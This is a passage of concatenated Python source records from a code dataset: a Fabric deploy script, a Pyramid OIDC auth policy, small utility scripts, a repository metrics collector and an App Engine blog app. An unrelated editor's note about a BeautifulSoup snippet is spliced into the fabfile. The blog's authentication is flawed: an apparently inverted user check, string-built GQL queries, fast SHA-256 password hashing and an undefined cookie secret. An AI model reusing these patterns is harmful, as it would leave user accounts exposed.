input(\"Commit ID >>\")\n if not confirm(\"Do you want to rallback to Commit ID : %s ?\" % commit_id):\n abort(\"Aborting at rollback request.\")\n return commit_id\n\ndef test():\n \"\"\"\n 
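Editor's note on the BeautifulSoup snippet above: `find_all("span", {"calss':'red"})` is garbled (misspelled key, mixed quotes); the intended filter on the war-and-peace page is class="red", and naming the parser explicitly avoids bs4's guessed-parser warning. A runnable correction on inline HTML (the HTML here stands in for the fetched page):

```python
from bs4 import BeautifulSoup

html = '<span class="red">Anna Pavlovna</span><span class="green">said</span>'
soup = BeautifulSoup(html, "html.parser")

for name in soup.find_all("span", {"class": "red"}):
    print(name.get_text())                  # -> Anna Pavlovna
```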
confirmはプロンプト上にY/nの選択肢を表示する\n capture=Trueにするとコマンドの結果を見れる. .failed or return_codeで\n \"\"\"\n\n with settings(warn_only=True):\n result = local(\"nosetests\", capture=True)\n if result.failed and not confirm(\"Tests failed. Continue anyway?\"):\n abort(\"Aborting ad user request.\")\n\ndef commit(message=\"default commit\"):\n local(\"git add -A && git commit -m \\\"%s\\\"\" % message)\n\ndef push():\n local(\"git push origin master\")\n\ndef pre_deploy():\n with lcd(env.local_src_path):\n #test()\n print(env.local_src_path)\n commit()\n push()\n\ndef deploy():\n code_dir = \"~/working/\"\n with cd(code_dir): # デプロイ先ディレクトリに移動して\n run(\"git pull ~/repos/working.git master\") # リモートで実行する\n\ndef rollback():\n \"\"\"\n working ディレクトリでgit log --graph --onelineしてcommit idを取得すること\n 最後のcommitが最初に表示される\n \"\"\"\n commit_id = get_commit_id()\n with lcd(env.local_src_path):\n local(\"git revert %s\" % commit_id)\n push()\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":2023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"210813390","text":"dict_line = {}\n\nfor line in lines:\n dict_line[line[2]] = line\n\nfile_4 = open('/users/kcnco/github/100knock2021/pan/chapter02/col4.txt', 'w')\nfor elem in sorted(dict_line):\n file_4.write('\\t'.join(dict_line[elem]) + '\\n')\n\n##memo\n#a = [5,7,6,3,4,1,2]\n#b = sorted(a)\n#>>> a\n#[5, 7, 6, 3, 4, 1, 2]\n#>>> b\n#[1, 2, 3, 4, 5, 6, 7]\n","sub_path":"pan/chapter02/X18.py","file_name":"X18.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"601238364","text":"import logging\n\nfrom jose.exceptions import ExpiredSignatureError\nfrom oauthlib.oauth2.rfc6749.errors import InvalidGrantError\nfrom pyramid.authentication import CallbackAuthenticationPolicy\nfrom pyramid.interfaces import IAuthenticationPolicy\nfrom zope.interface import implementer\n\nfrom ..interfaces import IOIDCUtility\n\n\n@implementer(IAuthenticationPolicy)\nclass OIDCSessionAuthenticationPolicy(CallbackAuthenticationPolicy):\n # This auth policy requires a session factory to be set up.\n # In general cookie base session store won't work, as the cookie payload\n # usually exceeds 4kb\n\n def __init__(self, callback=None, debug=False, **kwargs):\n self.callback = callback\n self.debug = debug\n self.log = logging.getLogger(__name__)\n\n def get_token(self, request):\n # get tokens from session\n tokens = request.session.get('oidc.token')\n if tokens:\n return tokens.get('access_token')\n return None\n\n def _get_utility(self, request):\n return request.registry.getUtility(IOIDCUtility)\n\n def _validate_access_token(self, request):\n # verify access token and return claims\n # TODO: assumes access token is a jwt with useful attributes\n claims = request.environ.get('oidc.claims')\n if claims:\n # we already decoded the access token\n return claims\n oidc = self._get_utility(request)\n try:\n token = self.get_token(request)\n if token:\n claims = oidc.validate_token(token)\n except ExpiredSignatureError:\n # token is expired ... 
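Editor's note on X18.py above: the snippet reads from an undefined `lines` and hard-codes an absolute output path. A self-contained version of the same idea — index rows by their third column, then write them out key-sorted; the sample rows and output filename are illustrative:

```python
rows = [["b", "2", "k2"], ["a", "1", "k1"], ["c", "3", "k0"]]

# key each row by its third column, as X18.py does with line[2]
dict_line = {row[2]: row for row in rows}

with open("col_sorted.txt", "w") as f:
    for key in sorted(dict_line):
        f.write("\t".join(dict_line[key]) + "\n")   # rows emitted in key order
```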
if we have a refresh token, we can try to\n # update the token\n self.log.info('Access Token expired')\n oidc_tokens = request.session.get('oidc.token')\n if not (oidc_tokens and oidc_tokens.get('refresh_token')):\n # no refresh token\n del request.session['oidc.token']\n return None\n # try refresh\n oauth = oidc.get_oauth2_session(request, token=oidc_tokens)\n try:\n self.log.info('Refreshing Access Token...')\n response = oauth.refresh_token(\n oidc.token_endpoint,\n auth=(oidc.client_id, oidc.client_secret)\n )\n self.log.info('Access Token refreshed')\n except InvalidGrantError:\n # most likely because refresh token has expired\n del request.session['oidc.token']\n self.log.info('Access Token refresh failed')\n return None\n # validate id_token\n id_token = oidc.validate_token(response['id_token'])\n access_token = response['access_token']\n claims = oidc.validate_token(access_token)\n # store new tokens in session (store full token response)\n oidc_tokens = dict(response)\n # and the decoded id_token\n oidc_tokens['id_token'] = id_token\n request.session['oidc.token'] = oidc_tokens\n if claims:\n # store claims in familiar place as well\n request.environ['oidc.claims'] = claims\n return claims\n\n # @IAuthenticationPolicy\n def unauthenticated_userid(self, request):\n \"\"\"Get identity from request Auth header without validation\"\"\"\n # we verify and extract the token here, so that we can\n # inspect the claims in the callback\n # if verify fails, we return None\n # any claims in the request.env\n claims = self._validate_access_token(request)\n if not claims:\n return None\n oidc = self._get_utility(request)\n return claims.get(oidc.userid_claim)\n\n # @IAuthenticationPolicy\n def remember(self, request, userid, **kw):\n \"\"\" Return a set of headers suitable for 'remembering' the\n :term:`userid` named ``userid`` when set in a response. An\n individual authentication policy and its consumers can\n decide on the composition and meaning of ``**kw``.\n \"\"\"\n # We already store the tokens in the session ... 
nothing to do here\n return []\n\n # @IAuthenticationPolicy\n def forget(self, request):\n \"\"\" Return a set of headers suitable for 'forgetting' the\n current user on subsequent requests.\n \"\"\"\n # Clear session\n request.session.invalidate()\n return []\n","sub_path":"src/pyramid_oidc/authentication/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"64816062","text":"from appJar import gui\r\n\r\ndef addItem(maximumLength, itemGroupName, app, press, rowStart = 0, columnStart = 1, bottomButton = False, isFirstAdd = True):\r\n label = \"{} Name \".format(itemGroupName)\r\n heading = \"Add {}s\".format(itemGroupName)\r\n \r\n headingRow = rowStart\r\n entryRow = headingRow + 1\r\n \r\n if not bottomButton:\r\n buttonRow = entryRow\r\n buttonColumn = columnStart + 4\r\n else:\r\n buttonRow = entryRow + 6\r\n buttonColumn = columnStart + 1\r\n \r\n #app.startTab(heading)\r\n app.addLabel(heading, heading, headingRow, columnStart, colspan = 2)\r\n app.addLabelEntry(label, entryRow, columnStart)\r\n if isFirstAdd: app.setEntryFocus(label)\r\n app.setEntryMaxLength(label, maximumLength)\r\n app.addNamedButton(\"Add\", \"Add\" + itemGroupName, press, row = buttonRow, column = buttonColumn)\r\n #app.stopTab()","sub_path":"AddView.py","file_name":"AddView.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"467843109","text":"import os\r\nimport random\r\nimport webbrowser\r\n\r\nfrom datetime import datetime as dt\r\nfrom datetime import timedelta\r\nfrom time import sleep\r\n\r\n\r\ndef get_random_url():\r\n url_list = os.path.join('.', 'music.txt')\r\n with open(url_list, 'r') as file:\r\n urls = file.readlines()\r\n return random.choice([yt_url.strip() for yt_url in urls]) # returning randomly chosen url from the list\r\n\r\n\r\ndef print_header():\r\n print('-------------------------------------------------------')\r\n print(' Set Alarm ')\r\n print('-------------------------------------------------------')\r\n\r\n print()\r\n\r\n\r\ndef get_alarm_time():\r\n user_time = input(\"When do you want to set the alarm? 
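Editor's note on the OIDC session policy above: the expired-token branch catches `jose.exceptions.ExpiredSignatureError`, which is what python-jose raises when a JWT's `exp` claim has passed. A minimal reproduction, assuming the utility's `validate_token` wraps `jose.jwt.decode`; the symmetric key and claims are illustrative:

```python
import time
from jose import jwt
from jose.exceptions import ExpiredSignatureError

key = "secret"                              # illustrative key, not the utility's config
token = jwt.encode({"sub": "alice", "exp": int(time.time()) - 10}, key,
                   algorithm="HS256")       # already expired

try:
    jwt.decode(token, key, algorithms=["HS256"])
except ExpiredSignatureError:
    print("Access Token expired")           # the policy would now try the refresh token
```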
[hh:mm]: \").strip()\r\n while not isinstance(user_time, type(dt.now())): # checking if time is provided correctly\r\n try:\r\n user_time = dt.strptime(user_time, \"%H:%M\")\r\n except ValueError:\r\n print(\"\")\r\n user_time = input(\"Please, give a proper time in format [hh:mm]: \").strip()\r\n user_time = user_time.replace(year=dt.now().year, month=dt.now().month, day=dt.now().day) # correcting date\r\n if user_time > dt.now():\r\n return user_time\r\n else:\r\n return user_time + timedelta(days=1)\r\n\r\n\r\ndef set_alarm(desired_time):\r\n time_left = desired_time - dt.now()\r\n hours_left = int(timedelta.total_seconds(time_left)) / 3600\r\n minutes_left = (int(timedelta.total_seconds(time_left)) / 60) % 60\r\n print('\\nThe alarm will ring in {} hours and {} minutes.'.format(int(hours_left), int(minutes_left)))\r\n\r\n sleep(timedelta.total_seconds(time_left))\r\n\r\n\r\ndef ring_alarm(music_url):\r\n webbrowser.open(music_url)\r\n\r\n\r\ndef check_file():\r\n if not os.path.isfile('music.txt'):\r\n print(\"A file with music urls is missing, creating new one...\\n\")\r\n music_file = open(\"music.txt\", 'w')\r\n music_file.write(\"https://www.youtube.com/watch?v=dQw4w9WgXcQ\\n\")\r\n music_file.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n print_header()\r\n set_another = 'y' # variable used in a loop\r\n check_file() # checking if file with urls exist\r\n\r\n while set_another.lower().strip() == 'y':\r\n url = get_random_url() # choosing random url from a file\r\n\r\n alarm_time = get_alarm_time() # asking for a time to set the alarm\r\n set_alarm(alarm_time)\r\n ring_alarm(url)\r\n\r\n set_another = input(\"Set another alarm? [y/n]: \")\r\n\r\n print(\"\\n Goodbye!\")\r\n print('-------------------------------------------------------\\n')\r\n","sub_path":"alarm.py","file_name":"alarm.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"499134644","text":"import json\nimport os\nimport subprocess\n\nimport git\nimport pandas\nimport shutil\n\nfrom git import Repo\nfrom shared_constants import data_dir, repo_candidates_filename\n\ntemp_repo_dir = \"temp-repo\"\ncode_metrics_file = \"code-metrics.csv\"\ncode_metrics_folder = \"code-metrics\"\n\n\ndef read_json(filename):\n print(\"reading result from {}/{}\".format(data_dir, filename))\n with open(\"{}/{}.json\".format(data_dir, filename), \"r\") as file:\n data = json.load(file)\n\n return data\n\n\ndef main():\n # for all repos\n\n candidate_repos = read_json(repo_candidates_filename)\n\n # create the folder where to store the code metrics\n if not os.path.exists(\"{}/{}\".format(data_dir, code_metrics_folder)):\n os.makedirs(\"{}/{}\".format(data_dir, code_metrics_folder))\n\n metrics = None\n for i in range(0, len(candidate_repos)):\n # for i in range(0, 10):\n\n # create the folder where to store the repos temporarily\n if not os.path.exists(temp_repo_dir):\n os.makedirs(temp_repo_dir)\n\n candidate_repo = candidate_repos[i]\n\n # download repo\n git_url = candidate_repo[\"html_url\"]\n repo_name = candidate_repo[\"name\"]\n\n print(\"============================================\")\n print(\"cloning repository {}\".format(repo_name))\n try:\n Repo.clone_from(git_url, temp_repo_dir)\n except git.exc.GitCommandError:\n print(\"error cloning repository\")\n continue\n\n # calculate code metrics on last snapshot\n print(\"calculating code metrics\")\n repo_id = candidate_repo[\"id\"]\n output_file = \"{}/{}/{}-{}\".format(data_dir, 
code_metrics_folder, repo_id, code_metrics_file)\n\n if not compute_metrics(output_file):\n continue\n\n temp_frame = prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name)\n\n if metrics is None:\n metrics = temp_frame\n else:\n metrics = pandas.concat([metrics, temp_frame], ignore_index=True)\n\n print(\"save data to csv\")\n metrics.to_csv(\"{}/final-{}\".format(data_dir, code_metrics_file))\n\n shutil.rmtree(temp_repo_dir)\n\n\ndef compute_metrics(output_file):\n # e.g \"Exception in thread \"main\" java.lang.NullPointerException...\"\n # java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar temp-repo/ data/36057260-code-metrics.csv\n # subprocess.run(\"java -jar ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar {} {}\"\n # .format(temp_repo_dir, output_file), shell=True)\n\n try:\n subprocess.run(\n \" \".join(\n [\"java\", \"-jar\", \"ck/ck-0.2.1-SNAPSHOT-jar-with-dependencies.jar\", temp_repo_dir, output_file]\n ),\n shell=True, check=True,\n timeout=60 * 10\n )\n\n except subprocess.CalledProcessError:\n print(\"exception analysing the repository - skipping\")\n shutil.rmtree(temp_repo_dir)\n return False\n\n except subprocess.TimeoutExpired:\n print(\"timeout analysing the repository - skipping\")\n shutil.rmtree(temp_repo_dir)\n return False\n\n return True\n\n\ndef prepare_metrics_data(candidate_repo, output_file, repo_id, repo_name):\n # analyse code quality vs stars and num contributors\n print(\"preparing data\")\n metrics_raw = pandas.read_csv(output_file)\n metrics_raw.pop(\"file\")\n metrics_raw.pop(\"class\")\n metrics_raw.pop(\"type\")\n # for each metric compute mean, median, Q1, and Q3\n mean = metrics_raw.mean().rename(lambda x: \"average_{}\".format(x))\n median = metrics_raw.median().rename(lambda x: \"median_{}\".format(x))\n q1 = metrics_raw.quantile(q=0.25).rename(lambda x: \"Q1_{}\".format(x))\n q3 = metrics_raw.quantile(q=0.75).rename(lambda x: \"Q3_{}\".format(x))\n temp_frame = pandas.DataFrame(pandas.concat([mean, median, q1, q3])).T\n temp_frame['id'] = repo_id\n temp_frame['name'] = repo_name\n temp_frame['stars'] = candidate_repo[\"stargazers_count\"]\n temp_frame['contributors_total'] = candidate_repo[\"num_contributors\"]\n return temp_frame\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"static_code_metrics.py","file_name":"static_code_metrics.py","file_ext":"py","file_size_in_byte":4112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"214169032","text":"import os\nimport re\nimport random\nimport webapp2\nimport hashlib\nimport hmac\nimport datetime\nfrom string import letters\n\nimport jinja2\n\nfrom google.appengine.ext import db\nfrom google.appengine.ext.db import metadata\n\ntemplate_dir = os.path.join(os.path.dirname(__file__), 'templates')\njinja_env = jinja2.Environment(loader = jinja2.FileSystemLoader(template_dir),\n autoescape = True)\n\ndef blog_key(name='default'):\n return db.Key.from_path('blogs', name)\n\ndef user_key(group='default'):\n return db.Key.from_path('users', group)\n\ndef post_key(post_id):\n return db.Key.from_path('Post', int(post_id), parent=blog_key())\n\ndef render_str(template, **params):\n tmp = jinja_env.get_template(template)\n return tmp.render(params)\n\ndef like_dup(ent, login_id, post_id):\n key = post_key(post_id)\n like_exists = db.GqlQuery(\"SELECT * \"\n \"FROM \" + ent +\n \" WHERE like_user_id = '\" + login_id +\n \"' AND ANCESTOR IS :1\", key).get()\n return like_exists\n\nclass 
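Editor's note on static_code_metrics.py above: `prepare_metrics_data` builds one wide row per repository by renaming each aggregate Series (mean, median, Q1, Q3) before concatenating and transposing. A standalone check of that pandas pattern on toy CK-style columns:

```python
import pandas as pd

df = pd.DataFrame({"wmc": [1, 2, 3, 10], "loc": [5, 5, 7, 9]})

mean = df.mean().rename(lambda c: "average_{}".format(c))
median = df.median().rename(lambda c: "median_{}".format(c))
q1 = df.quantile(q=0.25).rename(lambda c: "Q1_{}".format(c))
q3 = df.quantile(q=0.75).rename(lambda c: "Q3_{}".format(c))

# concat the renamed Series, then transpose into a single wide row
row = pd.DataFrame(pd.concat([mean, median, q1, q3])).T
print(row.columns.tolist())                 # average_*, median_*, Q1_*, Q3_*
print(row.iloc[0]["median_wmc"])            # 2.5
```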
BlogHandler(webapp2.RequestHandler):\n\n################# ENCRYPTION ###################\n\n def make_salt(self, salt_length=5):\n return ''.join(random.choice(letters)\n for x in xrange(salt_length))\n\n def hash_pass(self, username, password, salt=None):\n if not salt:\n salt = self.make_salt()\n hashed_pass = hashlib.sha256(username + password + salt).hexdigest()\n return '%s|%s' % (salt, hashed_pass)\n\n def valid_pass_hash(self, username, password, hashed_pass):\n salt = hashed_pass.split('|')[0]\n return hashed_pass == self.hash_pass(username, password, salt)\n\n def make_secure_val(self, val):\n return '%s|%s' % (val, hmac.new(COOKIE_SECRET, val).hexdigest())\n\n def get_secure_val(self, secure_val):\n if secure_val:\n val = secure_val.split('|')[0]\n else:\n val = None\n if secure_val == self.make_secure_val(val):\n return val\n\n################# AUTHENTICATION ###################\n\n def user_exists(self, username):\n username_exists = db.GqlQuery(\"SELECT * \"\n \"FROM User \"\n \"WHERE username = :usernm\",\n usernm=username).get()\n return username_exists\n\n def user_auth(self, username, password):\n user = db.GqlQuery(\"SELECT * \"\n \"FROM User \"\n \"WHERE username = :usernm\",\n usernm=username).get()\n if user:\n return self.valid_pass_hash(user.username,\n password,\n user.pass_hash)\n\n################ TEMPLATES ##################\n\n def write(self, *a, **kw):\n self.response.out.write(*a, **kw)\n\n def render_tmp(self, template, **params):\n return render_str(template, **params)\n\n def render(self, template, **kw):\n if self.read_secure_cookie('usercookie'):\n\n user_id = self.read_secure_cookie('usercookie')\n\n key = db.Key.from_path('User',\n int(user_id),\n parent=user_key())\n\n user = db.get(key)\n login_status = \"Logged in as: %s \" % (user.username)\n nav = [('/', 'Home'),\n ('/newpost', 'Create New Post'),\n ('/logout', 'Log Out')]\n else:\n login_status = ''\n user_id = ''\n nav = [('/', 'Home'),\n ('/signup', 'Sign Up'),\n ('/login', 'Log In')]\n self.write(self.render_tmp(template, login_id=user_id,\n nav=nav, login_status=login_status, **kw))\n\n def set_secure_cookie(self, name, val, exp):\n cookie_val = self.make_secure_val(str(val))\n if exp and isinstance(exp, (int, long, float)):\n now = datetime.datetime.utcnow()\n expires = datetime.timedelta(seconds=exp)\n exp_date = (now + expires).strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\n else:\n exp_date = ''\n self.response.headers.add_header(\n 'Set-Cookie',\n '%s=%s; expires=%s; Path=/' % (name, cookie_val, exp_date))\n\n def read_secure_cookie(self, cookie_name):\n if self.request.cookies.get(cookie_name):\n cookie_val = self.request.cookies.get(cookie_name)\n val = self.get_secure_val(cookie_val)\n return val\n else:\n return\n\n############### POST DB MODELS #################\n\nclass Post(db.Model):\n\n author_id = db.StringProperty(required=True)\n author_name = db.StringProperty(required=True)\n subject = db.StringProperty(required=True)\n content = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n modified = db.DateTimeProperty(auto_now=True)\n\n def post_likes(self, post_id):\n\n kinds = metadata.get_kinds()\n if u'PostLike' in kinds:\n likes = db.GqlQuery(\"SELECT * \"\n \"FROM PostLike \"\n \"WHERE ANCESTOR IS :1\",\n post_key(post_id)).count()\n else:\n likes = 0\n return likes\n\n def render_post(self, login_id, post_id):\n likes = self.post_likes(post_id)\n self._render_text = self.content.replace('\\n', '
    ')\n return render_str(\"post.html\", login_id=login_id,\n likes=likes, post=self)\n\n def post_like_dup(self, login_id, post_id):\n exists = like_dup('PostLike', login_id, post_id)\n return exists\n\n############# NEW POST HANDLER ###############\n\nclass NewPost(BlogHandler):\n\n def get(self):\n\n if self.read_secure_cookie('usercookie'):\n self.render(\"newpost.html\")\n else:\n self.redirect('/signup')\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n subject_input = self.request.get('subject')\n content_input = self.request.get('content')\n if self.read_secure_cookie('usercookie'):\n\n user_id = self.read_secure_cookie('usercookie')\n key = db.Key.from_path('User', int(user_id), parent=user_key())\n user = db.get(key)\n\n if subject_input and content_input and user_id:\n post = Post(parent=blog_key(),\n author_id=user_id,\n author_name=user.username,\n subject=subject_input,\n content=content_input)\n post.put()\n\n post_id = str(post.key().id())\n self.redirect('/post-%s' % post_id)\n else:\n input_error = \"Please submit both the title and content.\"\n self.render(\"newpost.html\", subject=subject_input,\n content=content_input,\n error=input_error)\n else:\n self.redirect('/signup')\n\n############### POST LINK HANDLER ###############\n\nclass PostLink(BlogHandler):\n\n def get(self, login_id):\n\n url_str = self.request.path\n post_id = url_str.rsplit('post-', 1)[1]\n key = post_key(post_id)\n post = db.get(key)\n\n kinds = metadata.get_kinds()\n\n if u'Comment' in kinds:\n comments = db.GqlQuery(\"SELECT * \"\n \"FROM Comment \"\n \"WHERE ANCESTOR IS :1\", key)\n else:\n comments = ''\n self.render(\"postlink.html\", post=post,\n comments=comments)\n\n def post(self, login_id):\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n edit_post_id = self.request.get('edit_post_id')\n edit_comment_id = self.request.get('edit_comment_id')\n comment_post_id = self.request.get('comment_post_id')\n like_post_id = self.request.get('like_post_id')\n if comment_post_id:\n post_id = comment_post_id\n self.redirect('/newcomment?post_id=' + post_id)\n if edit_post_id:\n post_id = edit_post_id\n self.redirect('/editpost?post_id=' + post_id)\n if edit_comment_id:\n url_str = self.request.path\n post_id = url_str.rsplit('post-', 1)[1]\n comment_id = edit_comment_id\n self.redirect('/editcomment?post_id=%s&comment_id=%s' %\n (post_id, comment_id))\n if like_post_id:\n post_id = like_post_id\n user_id = self.read_secure_cookie('usercookie')\n if not like_dup('PostLike', user_id, post_id):\n like = PostLike(like_user_id=user_id,\n parent=post_key(post_id))\n like.put()\n self.redirect('/post-%s' % post_id)\n else:\n self.redirect('/signup')\n\n############### EDIT POST HANDLER ###################\n\nclass EditPost(BlogHandler):\n\n def get(self):\n\n post_id = self.request.get('post_id')\n key = db.Key.from_path('Post',\n int(post_id),\n parent=blog_key())\n # gets the post data based upon what\n # is passed from post_id into key\n post = db.get(key)\n if self.read_secure_cookie('usercookie'):\n user_id = 
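Editor's note on `set_secure_cookie` above: the cookie's Expires attribute is formatted by hand from a UTC offset in seconds. The same computation in isolation (the cookie value below is illustrative):

```python
from datetime import datetime, timedelta

now = datetime.utcnow()
exp_date = (now + timedelta(seconds=3600)).strftime("%a, %d %b %Y %H:%M:%S GMT")
print("usercookie=%s; expires=%s; Path=/" % ("42|deadbeef", exp_date))
```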
self.read_secure_cookie('usercookie')\n # If the current logged in user is not the post author\n # it redirects them back to the previous page\n if user_id == post.author_id:\n self.render(\"editpost.html\",\n subject=post.subject,\n content=post.content,\n post_id=post_id)\n else:\n referrer = self.request.headers.get('referer')\n if referrer:\n return self.redirect(referrer)\n return self.redirect_to('/')\n else:\n self.redirect('/signup')\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n post_id = self.request.get('post_id')\n subject_input = self.request.get('subject')\n content_input = self.request.get('content')\n post_key = db.Key.from_path('Post',\n int(post_id),\n parent=blog_key())\n post = db.get(post_key)\n if username == post.author_id:\n\n if subject_input and content_input:\n post = db.get(post_key)\n post.subject = subject_input\n post.content = content_input\n post.put()\n\n post_id = str(post.key().id())\n self.redirect('/post-%s' % post_id)\n else:\n input_error = \"Please submit both the title and content.\"\n self.render(\"editpost.html\", subject=subject_input,\n content=content_input,\n error=input_error, post_id=post_id)\n else:\n self.redirect('/signup')\n\n############### DELETE POST ###############\n\nclass DeletePost(BlogHandler):\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n post_id = self.request.get('post_id')\n key = db.Key.from_path('Post',\n int(post_id),\n parent=blog_key())\n post = db.get(key)\n if username == post.author_id:\n db.delete(key)\n self.render('/postdeleted.html')\n else:\n self.redirect('/signup')\n\n############### likes db Model ###################\n\nclass PostLike(db.Model):\n like_user_id = db.StringProperty(required=True)\n\n############### COMMENT DB MODELS #################\n\nclass Comment(db.Model):\n\n author_id = db.StringProperty(required=True)\n author_name = db.StringProperty(required=True)\n subject = db.StringProperty(required=True)\n content = db.TextProperty(required=True)\n created = db.DateTimeProperty(auto_now_add=True)\n modified = db.DateTimeProperty(auto_now=True)\n\n def render_comment(self, login_id):\n\n self._render_text = self.content.replace('\\n', '
<br>')\n return render_str(\"comment.html\", login_id=login_id,\n comment=self)\n\n############### NEW COMMENT HANDLER ##############\n\nclass NewComment(BlogHandler):\n def get(self):\n\n if self.read_secure_cookie('usercookie'):\n post_id = self.request.get('post_id')\n self.render(\"newcomment.html\", post_id=post_id)\n else:\n self.redirect('/signup')\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n post_id = self.request.get('post_id')\n subject_input = self.request.get('subject')\n content_input = self.request.get('content')\n if self.read_secure_cookie('usercookie'):\n\n user_id = self.read_secure_cookie('usercookie')\n key = db.Key.from_path('User', int(user_id), parent=user_key())\n user = db.get(key)\n\n if subject_input and content_input and user_id:\n comment = Comment(parent=post_key(post_id),\n author_id=user_id,\n author_name=user.username,\n subject=subject_input,\n content=content_input)\n comment.put()\n\n comment_id = str(comment.key().id())\n self.redirect('/comment-%s?post_id=%s' % (comment_id, post_id))\n else:\n input_error = \"Please submit both the title and content.\"\n self.render(\"newcomment.html\", subject=subject_input,\n content=content_input,\n error=input_error,\n post_id=post_id)\n else:\n self.redirect('/signup')\n\n############## COMMENT LINK HANDLER ##############\n\nclass CommentLink(BlogHandler):\n\n def get(self, login_id):\n\n post_id = self.request.get('post_id')\n url_str = self.request.path\n comment_id = url_str.rsplit('comment-', 1)[1]\n comment_key = db.Key.from_path('Comment', int(comment_id),\n parent=post_key(post_id))\n comment = db.get(comment_key)\n\n self.render(\"commentlink.html\", comment=comment)\n\n def post(self, login_id):\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n comment_id = self.request.get('edit_comment_id')\n post_id = self.request.get('post_id')\n comment_key = db.Key.from_path('Comment', int(comment_id),\n parent=post_key(post_id))\n comment = db.get(comment_key)\n\n if self.read_secure_cookie('usercookie'):\n if username == comment.author_id:\n if comment_id and post_id:\n self.redirect('/editcomment?comment_id=%s&post_id=%s' %\n (comment_id, post_id))\n else:\n self.redirect('/signup')\n\n############### EDIT COMMENT HANDLER ################\n\nclass EditComment(BlogHandler):\n\n def get(self):\n\n comment_id = self.request.get('comment_id')\n post_id = self.request.get('post_id')\n key = db.Key.from_path('Comment',\n int(comment_id),\n parent=post_key(post_id))\n\n comment = db.get(key)\n if self.read_secure_cookie('usercookie'):\n user_id = self.read_secure_cookie('usercookie')\n\n if user_id == comment.author_id:\n self.render(\"editcomment.html\",\n subject=comment.subject,\n content=comment.content,\n post_id=post_id,\n comment_id=comment_id)\n else:\n referrer = self.request.headers.get('referer')\n if referrer:\n return self.redirect(referrer)\n return self.redirect_to('/')\n else:\n self.redirect('/signup')\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n 
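# NOTE (editorial sketch, not part of the original handlers): the\n # cookie-plus-user check above is repeated verbatim in every POST method.\n # A hypothetical shared helper on BlogHandler could centralize it while\n # mirroring the existing logic exactly, including the\n # `not self.user_exists(...)` test as written above:\n #\n # def passes_auth_check(self):\n # user_id = self.read_secure_cookie('usercookie')\n # return bool(user_id) and not self.user_exists(user_id)\n #\n # Each handler body could then begin with:\n # if not self.passes_auth_check():\n # return self.redirect('/signup')\n 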
username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n post_id = self.request.get('post_id')\n comment_id = self.request.get('comment_id')\n subject_input = self.request.get('subject')\n content_input = self.request.get('content')\n comment_key = db.Key.from_path('Comment',\n int(comment_id),\n parent=post_key(post_id))\n\n if subject_input and content_input:\n comment = db.get(comment_key)\n comment.subject = subject_input\n comment.content = content_input\n comment.put()\n\n self.redirect('/comment-%s?post_id=%s' % (comment_id, post_id))\n else:\n input_error = \"Please submit both the title and the content.\"\n self.render(\"editcomment.html\", subject=subject_input,\n content=content_input, error=input_error,\n comment_id=comment_id, post_id=post_id)\n else:\n self.redirect('/signup')\n\n############## DELETE COMMENT ###############\n\nclass DeleteComment(BlogHandler):\n\n def post(self):\n\n auth_error = True\n if self.read_secure_cookie('usercookie'):\n auth_error = False\n else:\n auth_error = True\n username = self.read_secure_cookie('usercookie')\n if not self.user_exists(username):\n auth_error = False\n else:\n auth_error = True\n\n if not auth_error:\n comment_id = self.request.get('comment_id')\n post_id = self.request.get('post_id')\n key = db.Key.from_path('Comment',\n int(comment_id),\n parent=post_key(post_id))\n comment = db.get(key)\n if username == comment.author_id:\n db.delete(key)\n self.render('/commentdeleted.html')\n else:\n self.redirect('/signup')\n\n############### USER DB MODELS #################\n\nclass User(db.Model):\n\n username = db.StringProperty(required=True)\n pass_hash = db.StringProperty(required=True)\n email = db.StringProperty()\n\n############### NEW USER HANDLER SIGN UP 